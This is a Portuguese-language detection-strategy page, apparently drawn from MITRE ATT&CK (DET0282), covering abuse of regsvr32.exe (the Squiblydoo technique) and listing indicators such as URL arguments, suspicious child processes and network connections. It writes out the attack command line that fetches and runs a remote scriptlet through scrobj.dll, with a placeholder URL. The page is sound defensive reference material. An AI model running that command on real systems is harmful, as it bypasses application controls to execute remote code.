# DET0282 — Detection Strategy for System Binary Proxy Execution: Regsvr32 ## Descrição Esta estratégia detecta o abuso do binário legítimo `regsvr32.exe` para executar código malicioso, uma técnica clássica de Living-off-the-Land (LotL) que contorna controles de aplicação como AppLocker e WDAC. O `regsvr32` pode carregar DLLs e scripts COM via URLs remotas (squiblydoo attack), tornando-o especialmente perigoso por permitir execução de payloads sem toque em disco. O vetor de exploração mais comum é o uso de `regsvr32 /s /n /u /i:http://URL scrobj.dll`, que faz o download e executa um script COM diretamente da memória. Indicadores adicionais incluem `regsvr32.exe` com argumentos de linha de comando contendo URLs, caminhos UNC ou scripts encodados, e processos filhos incomuns gerados por `regsvr32.exe` como `cmd.exe`, `powershell.exe` ou `wscript.exe`. Esta técnica foi amplamente utilizada por grupos como [[g0050-apt32|APT32]] e em campanhas de entrega de [[s0154-cobalt-strike|Cobalt Strike]]. A detecção deve combinar monitoramento de linha de comando com análise de processos filho e conexões de rede iniciadas por `regsvr32.exe`, pois este binário raramente faz conexões de rede em uso legítimo. ## Indicadores de Detecção - `regsvr32.exe` com argumentos contendo `http://`, `https://` ou `\\` (UNC) - Processos filho de `regsvr32.exe`: `cmd.exe`, `powershell.exe`, `wscript.exe`, `mshta.exe` - Conexão de rede TCP/80 ou 443 originada por `regsvr32.exe` - `regsvr32.exe` executado por processo pai suspeito (Word, Excel, browser) - Flags `/s /n /u /i` combinadas em linha de comando - Carregamento de `scrobj.dll` por `regsvr32.exe` com script remoto ## Técnicas Relacionadas - [[t1218-system-binary-proxy-execution|T1218 — System Binary Proxy Execution]] - [[t1059-command-and-scripting-interpreter|T1059 — Command and Scripting Interpreter]] - [[t1566-phishing|T1566 — Phishing]] - [[t1027-obfuscated-files-or-information|T1027 — Obfuscated Files or Information]] ## Analytics Relacionadas - [[an0785-analytic-0785|AN0785 — Analytic 0785]] --- *Fonte: [MITRE ATT&CK — DET0282](https://attack.mitre.org/detectionstrategies/DET0282)*